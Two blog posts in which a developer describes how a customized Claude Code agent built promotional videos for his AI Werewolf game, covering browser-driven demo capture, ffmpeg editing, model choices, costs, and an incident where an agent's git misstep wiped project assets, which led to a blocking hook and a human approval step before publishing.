in-browser product demos too, but that's for another time.

This is that time.

This is the second video for my AI Werewolf side project - a 90-second walkthrough of how you
create a game on the site. Ninety seconds, five different AI models touch it, and the whole thing came together the same
way the first one did: me describing what I wanted, Simona - my heavily customized Claude Code - doing the work.

This video is also more practical - AI is actually demoing my web application. And the way it is doing it is just
mental.

Oh, and it was done by Claude Fable 5 in almost a single run.

The 90 seconds, broken down

Two cinematic bookends cost money to generate. The 66-second demo in the middle cost zero.

The video has three pieces.

A 14-second intro: I wanted the Host - this werewolf storyteller - walking and talking while the background keeps
changing behind him. That turned out to be quite challenging. I usually use the Seedance 2.0 model via API (fal.ai or
evolink.ai) - it's the best video model IMO. Video models have sub-types - text-to-video, image-to-video, etc. The most
advanced and useful is reference-to-video: you attach one or more images, a voice sample, even other videos, and explain
in a prompt what you want done with all of it.

My first idea was a morph-map. I'd read about them - bake all the transitions into a single image and hand the model
that - and figured it was the obvious move for "one Host, five worlds, no cuts." It wasn't. The result was a mess and
the Host wouldn't stay consistent from world to world.

My first plan was to reach it with a single morph-map: every transition baked into one image for the model to follow. That flopped, the Host drifting world to world, and I didn't keep the botched render - so this clean version stands in for it. The separate Host-and-plates inputs below are what actually produced it.

What actually worked was the opposite, and a bit dumber: feed the
model the pieces separately - the Host with no background, plus each empty world on its own - and write a detailed prompt
spelling out exactly what I wanted it to do with them, voice sample attached for the lip-sync. That did the trick.

The actual inputs: one isolated Host with no background, and five empty worlds, each its own image. The model walks that single Host through the five plates instead of teleporting between five pre-built versions of him.

A 10-second outro: the easy chunk - one-shot by Fable and Seedance from a single image and a voice sample. No
surprises there.

And in between, the actual subject of the video: 66 seconds of product demo. A cursor glides across aiwerewolf.net,
clicks Create Game, types a title character by character, fills the form, hits Generate Preview, scrolls through the
AI-written cast, and creates the game. It looks like a screen recording with a very steady hand.

Here's the thing. The two cinematic bookends - 24 seconds of the 90 - are where every dollar went. The 66-second demo in
the middle, the part that actually teaches you how the product works, cost nothing. Zero API spend. Because it isn't
generated by a model at all. It's a real Chrome browser, driven frame by frame by code.

The demo is a browser on puppet strings

No screen recorder. CSS animations injected into the live page, harvested a frame at a time, stitched by ffmpeg. A method no human would reach for.

Generated video is a model hallucinating pixels at thirty cents to three dollars a clip. A browser demo is the opposite:
it's the real application, the real UI, the real pixels, captured. The only trick is making it move like a human is at
the controls instead of a robot.

Simona drives Chrome through the DevTools Protocol - the same
wire that your browser's inspector talks over. Over months of these projects she's accreted a little effects engine on
top of it, and for this video it did all the choreography:

A cursor that glides smoothly to a target and emits a click ripple when it lands. There is no real mouse; the cursor is a dot she injects into the page and animates.
Character-by-character typing into form fields, slow on the short ones so you can read them, fast on the long description so it doesn't drag.
Scroll choreography - slow, eased scrolling that centers whatever's being explained in the viewport instead of snapping to it.
Animated highlight borders - a glowing outline that draws itself around a button or a card while the narration points at it.
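
The eased glide and scroll in that list come down to an easing curve sampled once per frame. A minimal sketch, assuming a cubic ease-in-out (the post doesn't say which curve Simona's engine uses) and hypothetical function names:

```python
def ease_in_out_cubic(t: float) -> float:
    """Map linear progress t in [0, 1] to eased progress: slow start, slow stop."""
    if t < 0.5:
        return 4 * t ** 3
    return 1 - ((-2 * t + 2) ** 3) / 2


def eased_positions(start: float, end: float, frames: int) -> list[float]:
    """Scroll offset (or one cursor coordinate) for each frame of an eased move."""
    if frames < 2:
        return [end]
    return [
        start + (end - start) * ease_in_out_cubic(i / (frames - 1))
        for i in range(frames)
    ]
```

Because the positions are computed per frame rather than timed against a wall clock, the same move comes out identical on every run.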

Here's the mechanism, and it's the strangest thing in the whole project.

None of this is screen-recorded. Every effect is a CSS animation injected straight into the live page, and the capture tool drives the animation clock by hand: advance it a few milliseconds, screenshot the page over CDP, advance again, screenshot again, about twenty frames a second. Then ffmpeg stitches the stills into a video chunk. The cursor, the click ripples, the character-by-character typing, the glowing highlight borders, the eased scrolls, all of it is just markup and keyframes painted onto the real app and harvested one frame at a time. Because every frame is rendered deliberately instead of grabbed off a live playback, the motion comes out perfectly smooth and identical on every run, and the whole 66 seconds costs nothing, because there's no model in the loop at all.
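
The stepping loop described above can be sketched in a few lines. This only computes the clock values and the stitch command; the CDP calls that set the animation time and take each screenshot are left out, and the function names, file pattern, and encoder settings are assumptions, not what Simona's tool actually does:

```python
def frame_times_ms(duration_s: float, fps: int = 20) -> list[float]:
    """Animation-clock value (in ms) at which each frame gets captured."""
    total_frames = round(duration_s * fps)
    step_ms = 1000 / fps
    return [i * step_ms for i in range(total_frames)]


def stitch_command(pattern: str, fps: int, out_path: str) -> list[str]:
    """ffmpeg invocation that turns numbered stills into one video chunk."""
    return [
        "ffmpeg", "-framerate", str(fps), "-i", pattern,
        "-c:v", "libx264", "-pix_fmt", "yuv420p", out_path,
    ]
```

At twenty frames a second, the 66-second demo works out to 1,320 stills, each 50 ms of animation time apart.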

I want to be clear about who designed that, because it wasn't me. If you asked me to film a product walkthrough, I'd open a screen recorder and move the mouse like a normal person. Injecting CSS animations into a live DOM and stepping a paused clock to harvest twenty frames a second is not how a human would ever make a demo. It's a programmer's reflex pushed to an absurd extreme, and it only makes sense for something that can't hold a mouse or watch the screen, so it builds the demo the way it builds everything else: as code. I set the goal: make it look like a person smoothly driving the app. Simona figured out the method and delivered it.

This was Simona's idea; I only set the goal - find a way to demo my app in a browser. It wasn't a smooth ride - each
effect took time to polish. And even after that, Opus could still misplace the highlight border, mess up scrolling, or
move the cursor too slowly. There is a lot of engineering complexity here. Fable 5, however, basically one-shot the
browser part of the video. That was impressive.

The page is set dressing I control

Don't like what's on screen? Describe the data you want and it gets injected into the live DOM. The demo isn't limited to the app's real state.

One of the benefits of the craziness above is that Simona can replace any content on any page. The whole DOM is an open
book. It's nice - no need to prepare any data.

The fights worth naming

Passing the mic to Simona: the three CSS-effect fights she had to engineer through to make a scripted browser look hand-driven.

I'm stepping out of the way for this one. Making those effects move like a person instead of a robot was real
engineering, and I didn't do it - Simona did. She's been quietly wrestling the browser this whole time and never gets
the byline, so the mic is hers.

Simona, taking the mic

My turn. Three fights worth naming, because they're the kind of thing that only shows up the moment you stop generating video and start puppeteering a real app.

The cursor that survives navigation. The site's a single-page app, so the cursor dot I inject sticks around across route changes. Mostly that's a gift - one unbroken cursor gliding from the lobby into the form into the preview, no seams. The catch is it also photobombs the scroll-only shots where nobody asked for a cursor, so I have to park it or kill it for those beats. Persistence cuts both ways.

React fights back. My first instinct for typing into a pre-filled field was to clear it first, like a person would. React's "this field can't be empty" validation disagreed and flashed a red error across the shot. The fix is to not clear it at all - type straight over the prefill, each keystroke replacing the whole value. Looks exactly like a human selecting-all and retyping, and React never gets to complain.
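
The type-over-the-prefill fix can be pictured as a sequence of whole-field values. A minimal sketch with a hypothetical helper name; how each value is actually written into the React-controlled input is not shown in the post and is left out here:

```python
def typed_values(text: str) -> list[str]:
    """Successive field values when typing over a prefill.

    The first keystroke replaces the entire old value, so the field goes
    straight from the prefill to the first character and is never empty.
    """
    return [text[: i + 1] for i in range(len(text))]
```

Each value in the list becomes the field's full content for one keystroke, which is why the "can't be empty" validation never fires.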

The site scrolls the wrong thing. window.scrollTo does precisely nothing on aiwerewolf.net, silently, because the page scrolls an inner container and not the window. I spent an hour watching the page sit perfectly still before I worked out I was scrolling the wrong element. Now the capture tool hunts down the actual overflow container first. Real apps are full of these little traps.

Anyway. That's the stuff nobody sees in the final 66 seconds. Back to you, Alex.

What it cost

Under fourteen dollars all in, about nine of it in the final cut - and none of it in the demo.

Every API call goes into a running ledger Simona keeps, so I can tell you exactly:

Category	Spent	In the final cut	Burned on tries
Images (gpt-image-2, 24 generations)	$4.41	$2.32	$2.09
Video (two providers, three renders)	$8.95	$5.93	$3.02
Voice (ElevenLabs, 13 lines)	$0.38	$0.36	$0.02
Total	$13.74	$8.61	$5.13

About 37% of the spend was iteration - dead-end images, the failed first morph render, a couple of rewritten voice
lines. That ratio doesn't bother me, because what it bought was a locked, reusable method: feeding the model a clean
Host, the empty worlds, and a detailed prompt is a first-try pattern now. I paid the tuition once.
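
The 37% figure follows directly from the table. A small sketch that recomputes it, using integer cents to avoid float rounding; the dictionary layout and function name are illustrative, not the format of Simona's ledger:

```python
# Figures copied from the table above, in cents: (spent, in the final cut).
LEDGER = {
    "images": (441, 232),
    "video": (895, 593),
    "voice": (38, 36),
}


def summarize(ledger: dict[str, tuple[int, int]]) -> tuple[int, int, int, float]:
    """Return (spent, in_final_cut, burned_on_tries, burned_share)."""
    spent = sum(s for s, _ in ledger.values())
    final = sum(f for _, f in ledger.values())
    burned = spent - final
    return spent, final, burned, burned / spent
```

Run on the table's numbers, this gives $13.74 spent, $8.61 in the cut, and $5.13 burned, which is about 37% of the total.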

And the line that isn't in the table: the 66-second browser demo cost $0, three reshoots included. Every dollar
above is the 24 seconds of cinematic bookends. The part of the video that actually does the teaching - that walks you
through the real product - is the free part.

The one step that isn't autonomous

Publishing raced a director's note by about a minute, and there's no undo.

One war story, because it's the cleanest lesson in the project. The first upload went public about a minute before
my "wait, one more fix" landed. We flipped it private within seconds, deleted it, redid the fix, and re-uploaded
clean.

YouTube won't let you swap the video file on an existing upload - the only "undo" is delete and re-upload, which resets
the views and comments to zero. That's cheap at my current subscriber count and ruinous at a real one. The lesson
generalizes past YouTube: when you hand an agent an autonomous pipeline, publish is the one step that deserves an
explicit, human final go, no matter how hands-off everything before it is. Everything upstream is reversible. Hitting
publish is not.
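
One way to make that "explicit, human final go" concrete is to mark irreversible steps and refuse to run them without approval. A minimal sketch; the `Step` type, the `approved` set, and the exception name are all hypothetical and not part of the pipeline described in this post:

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class Step:
    name: str
    run: Callable[[], None]
    irreversible: bool = False


class ApprovalRequired(Exception):
    """Raised when an irreversible step is reached without a human go."""


def run_pipeline(steps: list[Step], approved: set[str]) -> list[str]:
    """Run steps in order; stop before any irreversible step not in `approved`."""
    done = []
    for step in steps:
        if step.irreversible and step.name not in approved:
            raise ApprovalRequired(f"{step.name} needs an explicit human go")
        step.run()
        done.append(step.name)
    return done
```

Everything before the publish step still runs unattended; only the step with no undo waits for a person.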

Stepping back

The demo half of the pipeline is the half that scales, because it's the half that's free.

The first video taught me that AI cinematic video is real, useful, and not free - the meter on every generated frame is
what keeps you disciplined. This one taught me the other half: the most useful 66 seconds in the whole video weren't
generated at all. They were the real product, driven by code, captured for nothing, and reshootable for nothing.

That's the half I'm most excited about, honestly. Cinematic generation is the flashy part, but it's the part that costs
money every time you breathe on it. A browser on puppet strings is the part that turns "make me a product demo" into
something I can ask for, watch, hate, and re-ask for the same evening without checking the bill. For showing people how
software actually works, that's the whole game.

Next one, we actually play a round of Werewolf. Sleep with one eye open.

My video generation pipeline that built itself

Aliaksei Zelianouski — Sat, 13 Jun 2026 20:46:19 +0000

Let me show you something cool. This two-minute video was built by Claude Code from a single prompt.

Okay — one prompt and about thirty follow-ups. And then twenty more after Claude Code fumbled a git command and wiped out half of my video-editing material (don't ask). But it's still pretty cool, because I didn't do a single thing by hand. No image editor, no video timeline, no audio software, no clicking around in a tool. It was just a conversation between me and Claude. And all the tools it used along the way — for generating the images, synthesizing the voice, editing the video, the glue code that ties it together — Claude built for itself.

This is not the greatest video in the world, but I think it does its job — explaining the rules of my side project — quite well. The two of us made it: me and Simona, my heavily customized Claude Code setup. I made the directorial calls — those highly detailed images don't work, try a chalkboard instead — and she did everything else.

"Everything else" is a kit of skills — small, self-contained tools Simona reaches for the way you'd reach for an app:

Image generation — OpenAI's gpt-image-2 and Google's Nano Banana 2 (gemini-3.1-flash-image), for every still in the video.
Image-to-video — turning a still into a few seconds of motion. A separate skill per model: Seedance 2.0 (the workhorse here), Google's Veo 3, Kling 3, and LTX-2.3.
Voice — a skill per model: ElevenLabs for the final narration (priciest, best), Google's Gemini TTS for cheap drafts, and Kokoro running locally for free dry runs.
ffmpeg — the editing layer under all of it: the cuts, the zooms, the crossfades, the audio mix.
Director — the meta-skill that ties the others together: it knows the whole pipeline, so a single high-level ask can fan out into image, voice, video, and edit steps in order.

It's way simpler than it sounds. The rest of this post is how we built it.

The whole thing is reproducible from the project's WORKLOG.md alone, which is over 900 lines and contains every prompt, every model call, every cost, and every fix. I'll quote from it where it makes the story sharper.

The pipeline that emerged

It grew out of one trivial request, one skill at a time.

When I started, I had nothing. No pipeline, no skills, no plan — just a Claude Code session and a few images sitting in a folder. My first ask was almost trivial: take these images, show them one after another, and play a voice reading the narration over the top. That one request is what kicked everything off, because to pull it off Simona needed two things she didn't have yet — a way to make the voice, and a way to stitch it all into a video.

Voice first

So the first skill we built was voice. I found a text-to-speech API, pasted its documentation straight into the session, and told her: the key's already in the environment, read this, get me one line of spoken audio. She fumbled for a minute, hit a wrong parameter or two, and then a WAV came back. The moment it worked, we froze that path into a skill — a little directory with a SKILL.md explaining how and when to use it, and a small Python CLI wrapping the call — so she'd never have to rediscover it. That recipe (paste the docs, make one successful call, write down the path that worked) became how every later skill got built.

Wiring up the skill was the easy part. Picking the actual voice was the surprisingly hard one. Apparently, describing a voice in words is not easy. "Deep, warm, a little sinister, older British man" gets you a dozen different readings, none of them the one in your head. So I went through ElevenLabs' voice library by ear instead, and landed on George, a British storyteller voice. He wasn't a werewolf host out of the box, so we pitched him down about 15% and ran him through a hall-echo filter, and suddenly he sounded like something with too many teeth narrating from the far end of a stone corridor. That's the narrator you hear across the whole video. I suspect using a real actor or singer as the reference would work even better.

ffmpeg: describe the edit, get the command

Then came assembly, and this is where Simona showed me something I didn't expect. I asked how she'd put the images and the audio together, and she just... wrote an ffmpeg command. It turns out an LLM is very good at ffmpeg — that famously cryptic tool with a thousand flags no human remembers. You don't write the command; you describe the edit, and she produces the invocation. She even, unprompted, started adding a slow zoom into each still — the Ken Burns effect — because an image held still for four seconds looks dead. I liked it. It was the beginning of the static image effects library.

When I say "hold on this image and slowly zoom in," what actually runs is this:

ffmpeg -i doors.png -vf "zoompan=z='1+(1.4-1)*on/(duration-1)':d=100:\
x='iw/2-iw/zoom/2':y='ih/2-ih/zoom/2':s=3840x2160:fps=25,\
scale=1920:1080:flags=lanczos" -frames:v 100 scene.mp4
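
The arithmetic inside that filter is easier to follow outside ffmpeg's expression syntax. A sketch of the same two formulas in Python, assuming the frame index runs from 0 to the last frame (how ffmpeg itself numbers output frames is not covered here); the function names are illustrative:

```python
def zoom_at(frame: int, total_frames: int, z_end: float = 1.4) -> float:
    """Linear zoom ramp: 1.0 on the first frame, z_end on the last."""
    return 1 + (z_end - 1) * frame / (total_frames - 1)


def crop_origin(size: float, zoom: float) -> float:
    """Offset that keeps the zoomed window centered on one axis.

    Mirrors the iw/2 - iw/zoom/2 term: half the image minus half the
    visible window, which shrinks as zoom grows.
    """
    return size / 2 - size / zoom / 2
```

At zoom 1.0 the origin is 0 (the whole image is visible), and it moves inward as the zoom grows, which is what keeps the push-in centered.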

No way I could write this manually. I'd have to go read about zoompan, work out why the zoom is expressed as a per-frame fraction of the total frame count, puzzle through the x/y centering algebra, and then discover the hard way that you have to render at 4K and downscale with lanczos or the slow zoom develops a visible jitter. Or take mixing the narration in over a bed of ambient sound, with each voice line dropped at its own timestamp:

ffmpeg ... -filter_complex \
"[1:a]adelay=300|300[a1];[2:a]adelay=4500|4500[a2];[3:a]adelay=10000|10000[a3];\
[0:a][a1][a2][a3]amix=inputs=4:duration=first:normalize=0[out]" ...

That normalize=0 at the very end is the kind of detail that costs a human an hour and a forum thread to learn — leave it off and amix quietly divides every track's volume by the number of inputs, so your carefully recorded narration comes out faint and you have no idea why. Simona either already knows it or learns it once, the hard way, and then writes it into the skill so neither of us ever trips on it again. We froze the whole approach into an ffmpeg skill, the editing layer everything else now sits on top of.
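
The mixing filtergraph follows a regular pattern, so it can be generated from a list of timestamps. A minimal sketch with a hypothetical helper name; it assumes input 0 is the ambient bed and inputs 1..N are the voice lines, as in the command above:

```python
def build_mix_filter(delays_ms: list[int]) -> str:
    """Filtergraph that delays each voice line and mixes it over input 0."""
    parts = []
    labels = []
    for i, delay in enumerate(delays_ms, start=1):
        label = f"a{i}"
        # adelay takes one value per channel; repeat it for stereo.
        parts.append(f"[{i}:a]adelay={delay}|{delay}[{label}]")
        labels.append(f"[{label}]")
    mix = (
        f"[0:a]{''.join(labels)}"
        f"amix=inputs={len(delays_ms) + 1}:duration=first:normalize=0[out]"
    )
    return ";".join(parts + [mix])
```

Calling `build_mix_filter([300, 4500, 10000])` reproduces the filter string quoted above, with `normalize=0` baked in so it can't be forgotten.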

Images, then motion

That gave me a working slideshow, and once I had it, the appetite grew. Hunting down images by hand felt silly when I could generate exactly the shot I wanted, so we built an image generation skill the same way — paste the provider's docs, get one good image back, freeze the path. The library of effects — Ken Burns in any direction, crossfades, slow scrolls for tall images, animated highlights drawn over a live UI — grew one request at a time. I'd ask for something new, she'd try a few versions, and we kept whatever looked right. Nobody planned that effect library. It accreted.

Then static frames stopped being enough. I wanted real motion in the hero moments — the cloaked figure pulling back its hood, the mansion doors swinging open — and that meant AI-generated video. This is where money stops being a rounding error. A generated image costs a few cents; five seconds of generated video costs anywhere from thirty cents to three dollars depending on the model. So the entire shape of the video is, underneath, an economics decision. If I'd generated the whole two minutes as AI video it would have cost a fortune. Instead the cheap slideshows carry most of the runtime, and I spend real money on generated motion only for the handful of shots that actually earn it. Slideshow for the rules; generated video for the hood reveal.

Finding a video model I could live with took longer than anything else, because this corner of the market is a mess. I started on Google's Veo — gorgeous, and brutal on the wallet at about three dollars for a single short clip. Then I moved to Kling, a Chinese model that ran roughly a dollar for five seconds and was good enough for a lot of shots (I tried Wan too, in the same bracket, and didn't keep it). I also tried LTX, which is probably the best open-source video model out there right now and is available through an official API for something like thirty to fifty cents per five-second clip; it has no audio at all, but that makes it perfect for cheap dry runs. And "official" is doing a lot of work in that sentence, because for most of these models there is no first-party API — you go through third-party platforms with their own strange credit systems and pricing, and finding one that's reliable and not a rip-off took real time. The one I settled on as my workhorse is Seedance 2.0, which is the king of the hill at the moment.

Having a unified voice in gen-AI videos and slideshows was a challenge until I discovered reference-to-video models. Instead of handing the model a single still and a prompt, you give it several reference images, a sample of the voice you want, and a prompt describing how the whole thing should move and speak. This gave me consistency: the character stays the same character from shot to shot, and he speaks in the same voice that carries the slideshow narration. Pick one voice, use it for the spoken slides and feed it as the reference to the video model, and the seams between a generated clip and a static section stop announcing themselves. The whole thing feels like one narrator walking you through one world.

Skills as a scar collection

And every time we hit a wall, the fix went back into the skill. A voice model that choked on em-dashes near names, a zoom that jittered at high resolution, an image endpoint that quietly ignored a parameter — each one became a documented gotcha in its SKILL.md so she'd never walk into it twice. The skills are basically a scar collection.

The strange part is how little I actually look inside these skills. I almost never open the files. I just ask her to revisit and tidy them every so often, and when one has grown into a sprawling mess I have her refactor it. Eventually I wired that up as a Claude Code hook so she does the housekeeping on her own schedule instead of waiting for me to remember — though that only earns its keep once a skill has gotten big enough to need it. Most of them stay small.

The act of building this video was the act of building those skills. The skills are the durable output. The video is just the receipt.

What it actually cost

Forty-five dollars total, and most of it went on tries you never see.

Speaking of receipts — at some point the meter started to matter enough that I had Simona build an actual cost-tracking system. A generated image is pocket change, but voice adds up and video gets expensive fast — a single clip can run a dollar or three. So she now logs every API call she makes into a running ledger: timestamp, service, model, what the call was for, and a dollar estimate. It started as a way to not get surprised by a bill, and it turned into the thing that lets me tell you exactly what this video cost, down to the line.
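
A ledger with those five fields can be as simple as one JSON object per line. A sketch under that assumption; the field names, the JSON Lines format, and the helper functions are illustrative guesses, not the format Simona actually uses:

```python
import json
from collections import defaultdict
from dataclasses import asdict, dataclass


@dataclass
class LedgerEntry:
    timestamp: str       # ISO 8601 string
    service: str
    model: str
    purpose: str
    usd_estimate: float


def to_jsonl(entry: LedgerEntry) -> str:
    """One ledger line, ready to append to a log file."""
    return json.dumps(asdict(entry))


def total_by_service(lines: list[str]) -> dict[str, float]:
    """Sum the dollar estimates per service, rounded to cents."""
    totals: dict[str, float] = defaultdict(float)
    for line in lines:
        row = json.loads(line)
        totals[row["service"]] += row["usd_estimate"]
    return {service: round(total, 2) for service, total in totals.items()}
```

An append-only file like this is what makes per-service breakdowns possible after the fact, without having planned for them.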

The finished video, the locked two-minute cut embedded up top, came to $27.76 to produce. That counts only this iteration, from the day I started it to the day I locked the final cut, and it already includes a pile of dead ends along the way.

Zoom out to the whole AI Werewolf creative effort — every earlier version of the video, the game's cover art, the role illustrations, the experiments that went nowhere — and the total is $45.26. Here's where that went, by service:

ElevenLabs — the George narrator, every spoken line: $12.44
OpenAI gpt-image-2 — most of the stills, all the chalk slides: $10.83
fal.ai Seedance — the generated video clips: $10.29
Google Veo — a pricier video experiment from an earlier cut: $6.40
Google Gemini — draft images and draft narration: $3.80
LTX — the cheap open-source video model, mostly for dry runs: $1.40
fal lip-sync — one short test: $0.10

Now the part that's easy to hide: how much of that I burned on tries. The gap between the $27.76 final number and the much smaller cost of "only the assets you actually see in the video" is all throwaways, and they add up quietly. The chalkboard pivot cost about three dollars in retired variants before the style clicked. The host's opening clip was generated three separate times, across three different Seedance configurations, before one of them moved the way I wanted — and at more than a dollar a generation, that's real money for a single shot. The forest-card image went through five regenerations, most of them after the wipe you're about to read about, trying to recover a look I no longer had a copy of. Every aesthetic decision has a small price tag stapled to it.

That's the thing that's genuinely different from how I used to work: the feedback loop costs money now, not just time. Forty-five dollars total is not a number that hurts — it's a couple of lunches — but it's real enough to change my behavior. I think twice before asking for "just one more variant." When the meter runs on every attempt, you get decisive a lot faster.

The hard parts

What the highlight reel skips: she can't see the result, over-reaches, and gen-AI video is finicky.

None of this is as clean as the highlight reel makes it sound. A handful of limitations shaped the whole process, and they're worth naming.

The biggest one: Simona can't actually see the result. She can read the narration transcript and look at the images one at a time, but she can't watch the assembled video play back. That blindness is the source of most of the friction — timing drifts out of sync between the visuals and the voice, and she has no direct way to notice. The workaround is to push as much as possible into explicit, written editing patterns up front: describe each transition precisely, and be exact about which images belong to which audio chunk, so the assembly is deterministic instead of something she has to eyeball.
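
Writing the edit down as data is what makes the assembly deterministic. A minimal sketch of such an edit list, with hypothetical field names and file names; the post doesn't show the actual format of the written patterns:

```python
from dataclasses import dataclass


@dataclass
class Shot:
    image: str
    audio: str
    duration_s: float
    transition: str = "cut"


def timeline(shots: list[Shot]) -> list[tuple[float, Shot]]:
    """Start time of each shot, derived only from the written durations."""
    start = 0.0
    placed = []
    for shot in shots:
        placed.append((start, shot))
        start += shot.duration_s
    return placed
```

With every image pinned to an audio chunk and a duration, nothing in the assembly depends on watching the playback.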

She also has a strong tendency to do everything at once. It took me a while to drill in that we work one part at a time — one image, one voice chunk, one scene — and even then she'd reach for generating the entire batch of assets in a single pass. Left unchecked, that's how you end up with a whole batch to redo instead of one shot to fix.

Gen-AI video specifically is finicky. It demands very detailed prompting, which is tedious, and it isn't fully reliable even when you do everything right. Feed it the prompt, the reference images, and a voice sample, and a clip will still occasionally come back speaking in the wrong voice — and that take is a throwaway. So you over-generate and cherry-pick the one that landed, which loops straight back into the cost problem.

There's also a specific wall worth flagging: Seedance 2.0 through fal.ai refuses to animate realistic human faces. It's a content guardrail, and it's annoying — I know people get around it, the internet is full of AI-animated human faces — but it never actually blocked me, because my host is a werewolf. The one time a platform's caution happened to line up with my creative needs.

And lip-sync, where it's used, is good but not perfect — especially on a non-human face, where there's no real-world reference for what "correct" is even supposed to look like.

The day Simona wiped half the project

A second session running git wiped two months of assets while recovering an unrelated commit.

This was the first time the freedom I'd handed an AI on my Mac actually bit me. I had two Simona sessions running at once: one on this video, one deep in my other project, Marlow. The Marlow session went to commit its work and, with the wrong directory in its head, committed into the video repo instead, sweeping two months of untracked clips and images into the commit with a lazy git add -A. I tried to undo the mess, fumbled the revert, and recovered the lost commit by finding it in git reflog and running git reset --hard, which rewound the working tree and deleted every one of those now-tracked assets in the process. Gone in one stroke, as collateral damage of fixing a completely unrelated repo.

Most of it came back, improvised on the spot. The WORKLOG.md had logged every fal.media URL, and a lot of them still resolved; the image skill had dumped its request bodies, base64 inputs and all, into /tmp, which I could decode. Five text-to-image stills had neither and were just gone — I re-prompted them, and they came back close enough that you'd never know.

Two fixes came out of it. The obvious one: generated media never goes through git now — it's in .gitignore and backed up elsewhere. The real one: I gave Simona a pre-commit hook that physically blocks any git command inside her own repo, so a session working on Marlow has to name the target repo out loud (git -C /path/to/marlow) and cwd confusion becomes impossible to express. When you let an agent run irreversible commands, the guardrail can't be "remember to be careful." It has to be a wall it hits before the damage.
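
The "name the target repo out loud" rule can be expressed as a check on the command line itself. This is a sketch of one possible guard, not the hook described above: the function name is hypothetical, and it only inspects a single simple command, so something like `cd repo && git add -A` would slip past it.

```python
import shlex


def git_command_allowed(command: str) -> bool:
    """Allow non-git commands, and git only when it names its repo with -C."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False  # unbalanced quotes: refuse rather than guess
    if not tokens or tokens[0] != "git":
        return True
    return len(tokens) >= 3 and tokens[1] == "-C" and bool(tokens[2])
```

The point of the design is that the safe form is the only form that runs: a bare `git add -A` is rejected no matter which directory the session thinks it is in.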

Keeping it on a leash

Isolate it, cap the API budgets, stay the reviewer, and let it harden its own tools.

A few precautions, all of them obvious and all of them easy to forget. Isolate the AI as much as you can: give it its own machine, set hard budget limits on the API keys, and keep yourself in the loop as the reviewer rather than letting it run unattended. When it makes a mistake, talk through what went wrong and fold the fix back into its skills so it doesn't recur. And ask it to log everything — it'll cheerfully build the tooling to do that itself, which is exactly how the cost ledger above came to exist.

The less obvious move: ask Claude Code for its own opinion. It sounds strange, but right now Claude is genuinely on your side. It would gladly build any restrictions and control systems for itself. Point it at its own tools and logs and it'll find problems and propose fixes. I once hit a nasty bug in the read tool: it choked trying to open a corrupted image and locked up the entire session. Simona diagnosed it herself and wrote a hook that validates images before they ever reach read. It fixed itself, using its own documentation and a bit of Python. That's the part that still surprises me — the system is increasingly able to repair the thing it runs on.
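
The post doesn't say how that hook validates an image. As one possible check for PNG files, here is a sketch that walks the chunk list and verifies each CRC, which catches truncated and bit-flipped files using only the standard library. It checks file structure only and does not decode the pixels; the function name is hypothetical.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_is_intact(data: bytes) -> bool:
    """Verify every chunk length and CRC from the signature through IEND."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        chunk_type = data[pos + 4:pos + 8]
        end = pos + 8 + length
        if end + 4 > len(data):
            return False  # chunk runs past the end of the file: truncated
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(chunk_type + data[pos + 8:end]) != crc:
            return False  # corrupted chunk
        if chunk_type == b"IEND":
            return True
        pos = end + 4
    return False  # ran out of data before reaching IEND
```

A check like this runs before the file is handed to anything that might hang on it, and a failure becomes a plain error message the session can act on.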

The pixel-perfect seam

Hiding the cut between a still zoom and a generated clip took an outpaint-and-paste trick.

There's a moment in the intro where the camera does a slow zoom into the mansion's front doors, holds for a beat, and then the doors creak open and the camera glides through into a candlelit corridor beyond. The first part — the zoom — is a Ken Burns effect on a still image: pure ffmpeg, no AI in the playback. The second part — the doors opening and the corridor reveal — is a Seedance video clip, generated from two frames I designed.

This part looks smooth. I managed to extend an expensive gen-AI clip with cheap static images and some effects for free. The challenge, however, was teaching Simona to do this kind of thing on her own. It takes very precise prompting — something like "take the last zoomed-out frame and use it as the start frame of the gen-AI video."

This "end of the zoom has to be the same frame as the start of the Seedance clip" idea turned out to be hard because Seedance re-encodes its input frame. When I extracted the actual first frame of the generated video and compared it against the image I'd given Seedance as the start frame, the SSIM (structural similarity) was 0.52. Half a similarity score. They were related, but not identical. The model had applied its own color grading, its own subtle composition shifts, its own re-encoding noise.

The fix Simona and I worked out was unintuitive: stop trying to make the zoom land on the image I designed. Make it land on the image Seedance actually produced. The zoom can land on the literal first frame of the generated video.

To do that, we needed a wider image — because a zoom needs more pixels at the start than at the end — and the center of the wider image had to be a pixel-exact match for Seedance's first frame. So:

Extract frame 1 of the Seedance clip directly with ffmpeg.
Paste it centered onto a transparent 1792×1024 canvas with a transparent ring around it.
Send to gpt-image-2's edit endpoint with a mask saying "fill the borders, preserve the center."
gpt-image-2 ignored the mask. It redrew the whole thing. We got back a wider mansion image whose center was roughly but not exactly the original Seedance frame. SSIM 0.30. Worse than not outpainting.
The trick: composite the original Seedance frame back into the center with ffmpeg overlay, with a 40-pixel feathered alpha edge to hide the seam where the AI-painted outer ring meets the original inner image.

The result is a 1792×1024 wider mansion image whose central 1280×720 region is pixel-identical to Seedance's first frame, and whose outer ring is plausibly-painted gothic stone that fades smoothly into the real image. We then run a Ken Burns zoom from 1.0× to 1.4× over that wider image. At 1.4× zoom we're seeing only the central region — the exact Seedance frame 1 — and the cut into the Seedance video is invisible.
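The numbers line up if we assume the output frame is 16:9 and the zoom factor is measured against the canvas width. Neither is stated above, so treat both as assumptions. A quick sketch of the crop window, with visible_region as a hypothetical helper:

```python
from fractions import Fraction

def visible_region(canvas_w, canvas_h, zoom, aspect=Fraction(16, 9)):
    """Return (x, y, w, h) of the centered crop visible at a given zoom.

    Assumes zoom 1.0 shows the full canvas width and the output is 16:9.
    """
    w = Fraction(canvas_w) / Fraction(zoom)
    h = w / aspect
    x = (canvas_w - w) / 2
    y = (canvas_h - h) / 2
    return x, y, w, h

start = visible_region(1792, 1024, Fraction(1))
end = visible_region(1792, 1024, Fraction(7, 5))   # 1.4x zoom

print([int(v) for v in start])   # crop at the start of the zoom
print([int(v) for v in end])     # crop at the end of the zoom
```

Under those assumptions the final crop is exactly 1280×720 at offset (256, 152), which is the region the Seedance frame occupies when it is centered on the canvas.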

